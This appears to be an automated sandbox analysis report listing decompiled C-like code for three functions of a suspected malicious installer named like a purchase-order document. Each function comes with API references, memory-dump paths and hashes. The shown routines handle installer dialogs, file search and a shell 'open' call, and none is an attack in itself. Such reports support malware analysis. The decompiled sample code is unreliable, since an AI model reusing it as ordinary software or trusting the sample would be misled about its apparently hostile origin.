                                                                                                                          Function 00402654 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 39%
                                                                                                                          			E00402654(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A0C(2), _t19 - 0x19c) != 0xffffffff) {
					E00405C59(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405CFB();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                                          0x0040266c
                                                                                                                          0x00402680
                                                                                                                          0x0040268b
                                                                                                                          0x0040268c
                                                                                                                          0x004027c7
                                                                                                                          0x0040266e
                                                                                                                          0x0040266e
                                                                                                                          0x00402670
                                                                                                                          0x00402672
                                                                                                                          0x00402672
                                                                                                                          0x004028a4
                                                                                                                          0x004028b0

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402663
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1974802433-0
                                                                                                                          • Opcode ID: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
                                                                                                                          • Instruction ID: 2317ffd169cfaf4cb587e6187c2204c3bd1190871e25379d9522107c79eb17b9
                                                                                                                          • Opcode Fuzzy Hash: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
                                                                                                                          • Instruction Fuzzy Hash: 3AF0A732508100DAD710E7B49949AEEB368EF51328F60457BE505F20C1C6B84945DB2E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403AE4 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E00403AE4(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t141;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420564 = _t35;
					if(_t115 == 0x110) {
						 *0x423f88 = _t125;
						 *0x420578 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f540 = _t91;
						E00403FB7(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423768);
						 *0x42374c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420564 = 1;
					}
					_t122 =  *0x4091e8; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423fa0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00404003(0x40b);
						while(1) {
							_t37 =  *0x420564;
							 *0x4091e8 =  *0x4091e8 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091e8; // 0xffffffff
							__eflags = _t39 -  *0x423fa4;
							if(_t39 ==  *0x423fa4) {
								E0040140B(1);
							}
							__eflags =  *0x42374c - _t133;
							if( *0x42374c != _t133) {
								break;
							}
							__eflags =  *0x4091e8 -  *0x423fa4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405D1D(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403FB7(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403FB7(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403FB7(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42400c - _t133;
							_v32 = _t49;
							if( *0x42400c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403FD9(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f540, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42400c - _t133;
							if( *0x42400c == _t133) {
								_push( *0x420578);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f540);
							}
							E00403FEC();
							E00405CFB(0x420580, 0x423780);
							E00405D1D(0x420580, _t125, _t130,  &(0x420580[lstrlenA(0x420580)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420580);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423758);
									 *0x41fd50 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f80,  *_t130 +  *0x423760 & 0x0000ffff, _t125,  *(0x4091ec +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423758 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403FB7(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423758, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42374c - _t133;
									if( *0x42374c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423758, 8);
									E00404003(0x405);
									goto L58;
								}
								__eflags =  *0x42400c - _t133;
								if( *0x42400c != _t133) {
									goto L61;
								}
								__eflags =  *0x424000 - _t133;
								if( *0x424000 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423758);
						 *0x423f88 = _t133;
						EndDialog(_t125,  *0x41f948);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423758, 0x40f, 0, 1);
						__eflags =  *0x42374c;
						return 0 |  *0x42374c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420558, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420558,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E0040401E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423758, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42400c - _t133;
										if( *0x42400c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f948 = 1;
											L21:
											_push(0x78);
											L22:
											E00403F90();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f948 = _t127;
										goto L21;
									}
									__eflags =  *0x4091e8 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423758);
						 *0x423758 = _a12;
						L58:
						_t141 =  *0x421580 - _t133; // 0x0
						if(_t141 == 0 &&  *0x423758 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421580 = 1;
						}
						L61:
						return 0;
					}
				}
			}































                                                                                                                          0x00403aed
                                                                                                                          0x00403af6
                                                                                                                          0x00403c37
                                                                                                                          0x00403c3b
                                                                                                                          0x00403c3f
                                                                                                                          0x00403c41
                                                                                                                          0x00403c46
                                                                                                                          0x00403c51
                                                                                                                          0x00403c5c
                                                                                                                          0x00403c61
                                                                                                                          0x00403c63
                                                                                                                          0x00403c65
                                                                                                                          0x00403c68
                                                                                                                          0x00403c6d
                                                                                                                          0x00403c7b
                                                                                                                          0x00403c88
                                                                                                                          0x00403c8f
                                                                                                                          0x00403c8f
                                                                                                                          0x00403c90
                                                                                                                          0x00403c90
                                                                                                                          0x00403c95
                                                                                                                          0x00403c9b
                                                                                                                          0x00403ca2
                                                                                                                          0x00403ca8
                                                                                                                          0x00403caa
                                                                                                                          0x00403cea
                                                                                                                          0x00403cef
                                                                                                                          0x00403cf4
                                                                                                                          0x00403cf4
                                                                                                                          0x00403cf9
                                                                                                                          0x00403d02
                                                                                                                          0x00403d04
                                                                                                                          0x00403d09
                                                                                                                          0x00403d0f
                                                                                                                          0x00403d13
                                                                                                                          0x00403d13
                                                                                                                          0x00403d18
                                                                                                                          0x00403d1e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403d29
                                                                                                                          0x00403d2f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403d38
                                                                                                                          0x00403d40
                                                                                                                          0x00403d45
                                                                                                                          0x00403d48
                                                                                                                          0x00403d4e
                                                                                                                          0x00403d53
                                                                                                                          0x00403d56
                                                                                                                          0x00403d5c
                                                                                                                          0x00403d61
                                                                                                                          0x00403d64
                                                                                                                          0x00403d6a
                                                                                                                          0x00403d72
                                                                                                                          0x00403d78
                                                                                                                          0x00403d7e
                                                                                                                          0x00403d82
                                                                                                                          0x00403d89
                                                                                                                          0x00403d89
                                                                                                                          0x00403d89
                                                                                                                          0x00403d93
                                                                                                                          0x00403da5
                                                                                                                          0x00403db1
                                                                                                                          0x00403db6
                                                                                                                          0x00403dc0
                                                                                                                          0x00403dc6
                                                                                                                          0x00403dc8
                                                                                                                          0x00403dcd
                                                                                                                          0x00403dca
                                                                                                                          0x00403dca
                                                                                                                          0x00403dca
                                                                                                                          0x00403ddd
                                                                                                                          0x00403df5
                                                                                                                          0x00403df7
                                                                                                                          0x00403dfd
                                                                                                                          0x00403e12
                                                                                                                          0x00403dff
                                                                                                                          0x00403e08
                                                                                                                          0x00403e0a
                                                                                                                          0x00403e0a
                                                                                                                          0x00403e18
                                                                                                                          0x00403e28
                                                                                                                          0x00403e39
                                                                                                                          0x00403e40
                                                                                                                          0x00403e46
                                                                                                                          0x00403e4a
                                                                                                                          0x00403e4f
                                                                                                                          0x00403e51
                                                                                                                          0x00000000
                                                                                                                          0x00403e57
                                                                                                                          0x00403e57
                                                                                                                          0x00403e59
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403e5f
                                                                                                                          0x00403e63
                                                                                                                          0x00403e88
                                                                                                                          0x00403e8e
                                                                                                                          0x00403e94
                                                                                                                          0x00403e96
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403ebc
                                                                                                                          0x00403ec2
                                                                                                                          0x00403ec4
                                                                                                                          0x00403ec9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403ecf
                                                                                                                          0x00403ed2
                                                                                                                          0x00403ed5
                                                                                                                          0x00403eec
                                                                                                                          0x00403ef8
                                                                                                                          0x00403f11
                                                                                                                          0x00403f17
                                                                                                                          0x00403f1b
                                                                                                                          0x00403f20
                                                                                                                          0x00403f26
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403f30
                                                                                                                          0x00403f3b
                                                                                                                          0x00000000
                                                                                                                          0x00403f3b
                                                                                                                          0x00403e65
                                                                                                                          0x00403e6b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403e71
                                                                                                                          0x00403e77
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403e7d
                                                                                                                          0x00403e51
                                                                                                                          0x00403f48
                                                                                                                          0x00403f54
                                                                                                                          0x00403f5b
                                                                                                                          0x00000000
                                                                                                                          0x00403cac
                                                                                                                          0x00403cac
                                                                                                                          0x00403caf
                                                                                                                          0x00403ce2
                                                                                                                          0x00403ce2
                                                                                                                          0x00403ce4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403ce4
                                                                                                                          0x00403cb1
                                                                                                                          0x00403cb5
                                                                                                                          0x00403cba
                                                                                                                          0x00403cbc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403ccc
                                                                                                                          0x00403cd4
                                                                                                                          0x00000000
                                                                                                                          0x00403cda
                                                                                                                          0x00403b08
                                                                                                                          0x00403b08
                                                                                                                          0x00403b0c
                                                                                                                          0x00403b11
                                                                                                                          0x00403b20
                                                                                                                          0x00403b20
                                                                                                                          0x00403b29
                                                                                                                          0x00403b32
                                                                                                                          0x00403b3d
                                                                                                                          0x00403b3d
                                                                                                                          0x00403b49
                                                                                                                          0x00403b65
                                                                                                                          0x00403b68
                                                                                                                          0x00403b7b
                                                                                                                          0x00403b81
                                                                                                                          0x00403c24
                                                                                                                          0x00000000
                                                                                                                          0x00403c2d
                                                                                                                          0x00403b87
                                                                                                                          0x00403b94
                                                                                                                          0x00403b96
                                                                                                                          0x00403b98
                                                                                                                          0x00403bb7
                                                                                                                          0x00403bb7
                                                                                                                          0x00403bba
                                                                                                                          0x00403bbf
                                                                                                                          0x00403bc2
                                                                                                                          0x00403bd2
                                                                                                                          0x00403bd3
                                                                                                                          0x00403bd5
                                                                                                                          0x00403c0b
                                                                                                                          0x00403c1e
                                                                                                                          0x00000000
                                                                                                                          0x00403c1e
                                                                                                                          0x00403bd7
                                                                                                                          0x00403bdd
                                                                                                                          0x00403bf6
                                                                                                                          0x00403bfb
                                                                                                                          0x00403bfd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403bff
                                                                                                                          0x00403beb
                                                                                                                          0x00403beb
                                                                                                                          0x00403bed
                                                                                                                          0x00403bed
                                                                                                                          0x00000000
                                                                                                                          0x00403bed
                                                                                                                          0x00403be0
                                                                                                                          0x00403be5
                                                                                                                          0x00000000
                                                                                                                          0x00403be5
                                                                                                                          0x00403bc4
                                                                                                                          0x00403bca
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403bcc
                                                                                                                          0x00000000
                                                                                                                          0x00403bcc
                                                                                                                          0x00403bbc
                                                                                                                          0x00000000
                                                                                                                          0x00403bbc
                                                                                                                          0x00403ba2
                                                                                                                          0x00403ba9
                                                                                                                          0x00403baf
                                                                                                                          0x00403bb1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403bb1
                                                                                                                          0x00403b6d
                                                                                                                          0x00000000
                                                                                                                          0x00403b4b
                                                                                                                          0x00403b51
                                                                                                                          0x00403b5b
                                                                                                                          0x00403f61
                                                                                                                          0x00403f61
                                                                                                                          0x00403f67
                                                                                                                          0x00403f74
                                                                                                                          0x00403f7a
                                                                                                                          0x00403f7a
                                                                                                                          0x00403f84
                                                                                                                          0x00000000
                                                                                                                          0x00403f84
                                                                                                                          0x00403b49

                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B20
                                                                                                                          • ShowWindow.USER32(?), ref: 00403B3D
                                                                                                                          • DestroyWindow.USER32 ref: 00403B51
                                                                                                                          • SetWindowLongA.USER32 ref: 00403B6D
                                                                                                                          • GetDlgItem.USER32 ref: 00403B8E
                                                                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BA2
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403BA9
                                                                                                                          • GetDlgItem.USER32 ref: 00403C57
                                                                                                                          • GetDlgItem.USER32 ref: 00403C61
                                                                                                                          • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403C7B
                                                                                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403CCC
                                                                                                                          • GetDlgItem.USER32 ref: 00403D72
                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403D93
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403DA5
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403DC0
                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DD6
                                                                                                                          • EnableMenuItem.USER32 ref: 00403DDD
                                                                                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403DF5
                                                                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E08
                                                                                                                          • lstrlenA.KERNEL32(00420580,?,00420580,00423780), ref: 00403E31
                                                                                                                          • SetWindowTextA.USER32(?,00420580), ref: 00403E40
                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00403F74
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 184305955-0
                                                                                                                          • Opcode ID: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
                                                                                                                          • Instruction ID: 583b1d6e72ee06ddf0416b700d05e2a9c6fbe9640e5ca120217838ed285f2c24
                                                                                                                          • Opcode Fuzzy Hash: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
                                                                                                                          • Instruction Fuzzy Hash: 00C1C471A08205BBDB216F61ED85D2B7FBCEB4470AF50443EF601B51E1C739AA429B1E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004040FF Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E004040FF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420560 =  *0x420560 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E0040401E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422f20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422f20
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f88, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f88, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420560 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd50 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403FD9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040438A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42375c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423fb8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E004040CB;
				E00403FB7(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403FB7(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403FD9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403FEC(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423f90 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f544 =  *0x41f544 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420560 =  *0x420560 & 0x00000000;
				return 0;
			}

















                                                                                                                          0x0040410f
                                                                                                                          0x00404235
                                                                                                                          0x00404291
                                                                                                                          0x00404295
                                                                                                                          0x0040436c
                                                                                                                          0x0040436e
                                                                                                                          0x0040436e
                                                                                                                          0x00404374
                                                                                                                          0x00404374
                                                                                                                          0x00404377
                                                                                                                          0x00000000
                                                                                                                          0x0040437e
                                                                                                                          0x004042a3
                                                                                                                          0x004042a5
                                                                                                                          0x004042af
                                                                                                                          0x004042ba
                                                                                                                          0x004042bd
                                                                                                                          0x004042c0
                                                                                                                          0x004042cb
                                                                                                                          0x004042ce
                                                                                                                          0x004042d5
                                                                                                                          0x004042e3
                                                                                                                          0x004042fb
                                                                                                                          0x00404303
                                                                                                                          0x0040430e
                                                                                                                          0x0040431e
                                                                                                                          0x00404320
                                                                                                                          0x00404320
                                                                                                                          0x004042d5
                                                                                                                          0x0040432a
                                                                                                                          0x00000000
                                                                                                                          0x00404335
                                                                                                                          0x00404339
                                                                                                                          0x0040434a
                                                                                                                          0x0040434a
                                                                                                                          0x00404350
                                                                                                                          0x0040435e
                                                                                                                          0x0040435e
                                                                                                                          0x00000000
                                                                                                                          0x00404362
                                                                                                                          0x0040432a
                                                                                                                          0x00404240
                                                                                                                          0x00000000
                                                                                                                          0x00404254
                                                                                                                          0x0040425a
                                                                                                                          0x00404260
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404285
                                                                                                                          0x00404287
                                                                                                                          0x0040428c
                                                                                                                          0x00000000
                                                                                                                          0x0040428c
                                                                                                                          0x00404240
                                                                                                                          0x00404115
                                                                                                                          0x00404118
                                                                                                                          0x0040411d
                                                                                                                          0x0040412e
                                                                                                                          0x0040412e
                                                                                                                          0x00404135
                                                                                                                          0x00404138
                                                                                                                          0x0040413a
                                                                                                                          0x0040413f
                                                                                                                          0x00404148
                                                                                                                          0x0040414e
                                                                                                                          0x0040415a
                                                                                                                          0x0040415d
                                                                                                                          0x00404166
                                                                                                                          0x0040416b
                                                                                                                          0x0040416e
                                                                                                                          0x00404173
                                                                                                                          0x0040418a
                                                                                                                          0x00404191
                                                                                                                          0x004041a4
                                                                                                                          0x004041a7
                                                                                                                          0x004041bc
                                                                                                                          0x004041c3
                                                                                                                          0x004041c8
                                                                                                                          0x004041cd
                                                                                                                          0x004041cd
                                                                                                                          0x004041dc
                                                                                                                          0x004041eb
                                                                                                                          0x004041ed
                                                                                                                          0x00404203
                                                                                                                          0x00404212
                                                                                                                          0x00404214
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • CheckDlgButton.USER32 ref: 0040418A
                                                                                                                          • GetDlgItem.USER32 ref: 0040419E
                                                                                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041BC
                                                                                                                          • GetSysColor.USER32(?), ref: 004041CD
                                                                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041DC
                                                                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041EB
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 004041F5
                                                                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404203
                                                                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404212
                                                                                                                          • GetDlgItem.USER32 ref: 00404275
                                                                                                                          • SendMessageA.USER32(00000000), ref: 00404278
                                                                                                                          • GetDlgItem.USER32 ref: 004042A3
                                                                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042E3
                                                                                                                          • LoadCursorA.USER32 ref: 004042F2
                                                                                                                          • SetCursor.USER32(00000000), ref: 004042FB
                                                                                                                          • ShellExecuteA.SHELL32(0000070B,open, /B,00000000,00000000,00000001), ref: 0040430E
                                                                                                                          • LoadCursorA.USER32 ref: 0040431B
                                                                                                                          • SetCursor.USER32(00000000), ref: 0040431E
                                                                                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040434A
                                                                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040435E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
